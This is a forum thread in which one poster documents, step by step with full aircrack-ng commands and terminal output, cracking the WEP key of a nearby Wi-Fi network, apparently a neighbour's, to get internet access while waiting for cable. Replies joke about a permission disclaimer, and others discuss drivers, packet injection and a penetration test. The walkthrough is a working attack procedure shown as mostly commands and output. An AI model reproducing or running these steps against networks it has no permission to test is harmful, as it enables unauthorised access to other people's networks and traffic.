cracking WEP with aircrack-ng

[LSOChris]

i just moved from Texas to Northern VA and its been hell finding a place to rent. We finally found a place but the cable man didn't come till monday, now that wont do i need my EH.net fix. thankfully there are plenty of wifi networks i can see from inside the house...


######################
# Step 1: Target a specific network #
######################

root@segfault:/home/cg/eric-g# airodump-ng --bssid 00:18:F8:F4:CF:E4 -c 9 ath2 -w eric-g
CH 9 ][ Elapsed: 4 mins ][ 2007-11-21 23:08

BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID

00:18:F8:F4:CF:E4 21 21 2428 26251 0 9 48 WEP WEP OPN eric-G

BSSID STATION PWR Lost Packets Probes

00:18:F8:F4:CF:E4 06:19:7E:8E:72:87 23 0 34189

###########################
# Step 2: Associate with the target network #
###########################

root@segfault:/home/cg/eric-g# aireplay-ng -1 600 -e eric-G -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:53:23 Waiting for beacon frame (BSSID: 00:18:F8:F4:CF:E4)
22:53:23 Sending Authentication Request
22:53:23 Authentication successful
22:53:23 Sending Association Request
22:53:24 Association successful :-)
22:53:39 Sending keep-alive packet
22:53:54 Sending keep-alive packet
22:54:09 Sending keep-alive packet
22:54:24 Sending keep-alive packet
22:54:39 Sending keep-alive packet
22:54:54 Sending keep-alive packet
22:55:09 Sending keep-alive packet
22:55:24 Sending keep-alive packet
22:55:39 Sending keep-alive packet
22:55:54 Sending keep-alive packet
22:55:54 Got a deauthentication packet!
22:55:57 Sending Authentication Request
22:55:59 Sending Authentication Request
22:55:59 Authentication successful
22:55:59 Sending Association Request
22:55:59 Association successful :-)
22:56:14 Sending keep-alive packet

***KEEP THAT RUNNING

####################
# Step 3: Generate Key Stream #
####################

root@segfault:/home/cg/eric-g# aireplay-ng -5 -b 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 ath2
22:59:41 Waiting for a data packet...
Read 873 packets...

Size: 352, FromDS: 1, ToDS: 0 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = 01:00:5E:7F:FF:FA
Source MAC = 00:18:F8:F4:CF:E2

0x0000: 0842 0000 0100 5e7f fffa 0018 f8f4 cfe4 .B....^........
0x0010: 0018 f8f4 cfe2 c0b5 121a 4600 0e18 0f3d ..........F....=
0x0020: bd80 8c41 de34 0437 8d2d c97f 2447 3d81 ...A.4.7.-.$G=.
0x0030: 9bdc 68da 06b2 18be 9cd6 9cb4 9443 8725 ..h..........C.%
0x0040: 87f6 9a14 1ff9 0cfa bd36 862e ec54 7215 .........6...Tr.
0x0050: 335b 4a91 d6a4 caae 5a58 a736 6230 87d9 3[J.....ZX.6b0..
0x0060: 4e14 7617 21c6 eda4 9b0d 3a00 0b4f 47ab N.v.!.....:..OG.
0x0070: a529 dedf 4c13 880c a1e6 37f7 50e6 599c .)..L.....7.P.Y.
0x0080: 0a4c 0b7f 24ae b019 ef2f 36b9 c499 8643 .L.$..../6....C
0x0090: 6592 5835 23e5 c8e9 d1b9 3d36 1fe5 ecfe e.X5#.....=6....
0x00a0: 510b 51ba 4fe4 e2ed d33b 0459 ca68 82b8 Q.Q.O....;.Y.h..
0x00b0: c856 ea70 829f c753 1614 290e d051 392f .V.p...S..)..Q9/
0x00c0: fa65 cbc6 c5f8 24b1 cdbd 94e5 08c3 2dd4 .e....$.......-.
0x00d0: 6e4b 983b dc82 b2cd b3f1 dab5 b816 6188 nK.;..........a.
--- CUT ---

Use this packet ? y

Saving chosen packet in replay_src-1121-230028.cap
23:00:38 Data packet found!
23:00:38 Sending fragmented packet
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 384 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
23:00:38 Trying to get 1500 bytes of a keystream
23:00:38 Got RELAYED packet!!
23:00:38 Thats our ARP packet!
Saving keystream in fragment-1121-230038.xor
Now you can build a packet with packetforge-ng out of that 1500 bytes keystream

######################
# Step 4: Build a valid ARP Packet #
######################

root@segfault:/home/cg/eric-g# packetforge-ng -0 -a 00:18:F8:F4:CF:E4 -h 06:19:7E:8E:72:87 -k 255.255.255.255 -l 255.255.255.255 -w arp -y *.xor
Wrote packet to: arp

#########################
# Step 5: Generate your own arp traffic #
#########################

root@segfault:/home/cg/eric-g# aireplay-ng -2 -r arp -x 150 ath2

Size: 68, FromDS: 0, ToDS: 1 (WEP)

BSSID = 00:18:F8:F4:CF:E4
Dest. MAC = FF:FF:FF:FF:FF:FF
Source MAC = 06:19:7E:8E:72:87

0x0000: 0841 0201 0018 f8f4 cfe4 0619 7e8e 7287 .A..........~.r.
0x0010: ffff ffff ffff 8001 1f1a 4600 c9d3 e5e7 ..........F.....
0x0020: d65a 6a63 0b51 bb60 8390 a8b4 947d 456f .Zjc.Q.`.....}Eo
0x0030: 3a05 25b2 7464 7db7 c49b d38a f789 822c :.%.td}........,
0x0040: 83a8 93c5 ....

Use this packet ? y

Saving chosen packet in replay_src-1121-230224.cap
You should also start airodump-ng to capture replies. **we started airodump on step1

**at this point your airodump capture should really be filling up with a ton of data packets as we do the arp replay attack


################
# Step 6: Start cracking #
################

**we can run aircrack while the arp replay attack is ongoing, so you dont have to stop the arp replay or fake authentication sessions.

cg@segfault:~/eric-g$ aircrack-ng -z eric-g-05.cap
Opening eric-g-05.cap
Read 64282 packets.

# BSSID ESSID Encryption

1 00:18:F8:F4:CF:E4 eric-G WEP (21102 IVs)

Choosing first network as target.

Attack will be restarted every 5000 captured ivs.
Starting PTW attack with 21397 ivs.

Aircrack-ng 0.9.1


[00:00:11] Tested 78120/140000 keys (got 22918 IVs)

KB depth byte(vote)
0 3/ 5 34( 111) 70( 109) 42( 107) 2C( 106) B9( 106) E3( 106)
1 1/ 14 34( 115) 92( 110) 35( 109) 53( 109) 33( 108) CD( 107)
2 6/ 18 91( 114) E7( 114) 21( 111) 0E( 110) 88( 109) C6( 109)
3 2/ 31 37( 109) 80( 109) 5F( 108) 92( 108) 9E( 108) 9B( 107)
4 0/ 2 29( 129) 55( 114) AD( 112) 6A( 111) BB( 110) C1( 110)

KEY FOUND! [ 70:34:91:37:29 ]
Decrypted correctly: 100%


Total time to crack, 4 minutes ;-)

[BillV]

Disclaimer: The WiFi AP used in this scenario was owned by a friend who had given permission to test the WEP encryption.

 

[slimjim100]

lol yea and this was just an "Ethical" example of remote access.

Brian

[Kev]

Northern VA? Thats my old stomping ground.  I still have a lot of family there. Next time I get back that way I  will buy you a beer!

[LSOChris]

cheers!

[EmanoN]

I really had to bite my tongue on this one, but in my not so humble attempt to be  not such a dick, I guess I will let this one slide! At least you are honest about it. Enjoy your free internet CEH.

[LSOChris]

did that count as your last post?

[blinkcrack]

hi .... im having problems with airodump, looks like i need a driver or something like that.. im using win. vista

thx

[LSOChris]

did you go to the aircrack site and see if your wifi card was supported?

but yeah, you'll need a driver

[Kev]

Dont waste your time doing it with windows. You are not going to be able to inject.

[dannioni]

Great post, so now I have two questions, do you really need to re-authenticate constantly, and more importantly, I did a wireless pen test for a company last week, they used wep , so I injected arp packets and ran aircrack-ng with -z, I was suprise to see that the attack did not succeed even with 1m IVs, I cracked it with the standard mode, but now I' wondering anyone have any idea why it failed?

[Kev]

 I assume you are using the latest aircrack-ng since you are using the PTW command.  I have found cracking wep sometimes also requires a little luck and I believe the aircrack-ng site states the same thing. I have cracked 128 encryption with less than 200,000 IVs and once in awhile it has taken 2 million! 
  I really believe from my experience you will get the best results from using linux for this. Aircrack-ng was written to run on linux and later "ported" to run on windows and I use the term ported loosely.  However, you can get a driver that will enable many cards to go into monitor mode on windows at  the wildpackets site.
http://www.wildpackets.com/support/downloads
 As far as I know there is no "free" or stable way to inject packets with windows, unless you want to spend several hundred dollars. There are some windows hacks but reports are they are not reliable. I haven't tired to inject with windows but a colleague of mine has and mentioned the results were not that great and not worth the cost. Again , I cant say personally, but I would spend money on that solution with caution.
 If anyone here has had direct success with packet injection with windows, please share your experience.
 

 

[bojan]

for this purpose I have to set my wireless client to moniter mode!!so I need drivers for that!!my question is manufacturer supplied drivers will work or not if,i am in a limited account???

[LSOChris]

best thing to use is the madwifi drivers, but maybe one of the wireless gurus will answer.  i've had no issues with those drivers though.  I also have an atheros card.

[Kev]

I use the madwifi drivers also, but also I use hostap drivers sometimes because some apps i like require these. Make sure the kernel  you are running works with the driver you want to use. I have seen guys trying to compile drivers over and over trying to get them to work to no avail only to discover the kernel they are running doesnt support the driver they are trying to use, so save yourself some time and frustration. The aircrack-ng site has good instructions on how to modify the drivers you need. A lot depends on what you are trying to do. Typically you need "hacked" drivers in order to inject packets and when cracking smaller networks, packet injection is a must unless you want to spend days collecting IVs. Packet injection requires more than just being in monitor mode. You might find you can put your card into monitor mode but it doesn't inject.  The aircrack-ng site really has a lot of good info on it and anyone serious about cracking wifi should read it completely. After that you can bring in other apps or write your own to augment what you are doing. At that point you have a good foundation. Once you have it down, cracking wifi can be the most enjoyable thing you can do. Its actually can be cool watching all the packets your collecting and the aircrack-ng suite makes it very visual as you watch 1000 of packets inject and collect until the key "pops" up. Actually its one of the few visual hacks that would be interesting enough for hollywood.